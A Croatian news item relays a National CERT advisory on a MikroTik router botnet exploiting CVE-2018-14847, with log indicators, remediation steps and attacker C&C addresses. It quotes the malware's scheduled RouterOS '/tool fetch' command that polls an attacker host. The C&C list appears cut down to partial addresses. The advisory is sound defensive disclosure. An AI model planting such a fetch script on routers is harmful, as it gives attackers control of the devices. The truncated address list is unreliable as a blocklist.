U tijeku je botnet kampanja u kojoj se masovno napadaju MikroTik usmjerivači, priopćili su iz Nacionalnog CERT-a.

Napadi iskorištavaju ranjivost MikroTik RouterOS-a (CVE-2018-14847) za koju je zakrpa izdana 23. travnja 2018. godine. Iskorištavanje ranjivosti napadaču omogućava udaljeno čitanje korisničkih imena i lozinki administratorskih računa na usmjerivaču. Napadi u sklopu te botnet kampanje između ostaloga se koriste i za širenje zlonamjernog softvera za rudarenje kriptovaluta.

Botnet kampanja aktivna je i u Hrvatskoj. Primijećeni su napadi na uređaje u Hrvatskoj unutar zadnjih tjedan dana te postoje znakovi da se zaraženi uređaji koriste za slanje neželjene pošte.

Napadi mogu ostaviti tragove u dnevnicima (logs) u obliku zapisa prijave legitimnih korisničkih računa s neobičnih IP adresa, primjerice:

account user <ime legitimnog korisničkog računa> logged in from 95.154.216.151 via winbox

Za sanaciju napada, preporučuje se:

postavljanje ograničenja na IP adrese koje smiju pristupiti administracijskim servisima usmjerivača,

blokiranje poznatih zlonamjernih IP adresa (popis je dostupan niže),

brisanje komponenata zlonamjernog softvera s usmjerivača na temelju sada poznatih informacija (dodatne informacije dostupne su niže),

ažuriranje usmjerivača na novu, sigurniju inačicu,

izmjena lozinki svih korisnika za administraciju usmjerivača.

Za sada su poznate sljedeće IP adrese kontrolnih poslužitelja napadača (C&C servers):

216.151

216.160

216.163

216.165

216.167

Zlonamjerni softver na usmjerivaču može sadržavati sljedeće komponente:

skriptu nazvanu script3_ sa sadržajem sljedećeg oblika:

/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

zadatak u rasporedu (scheduler) naziva schedule3_ koji svakih 30 sekunda poziva navedenu skriptu

Podijeli: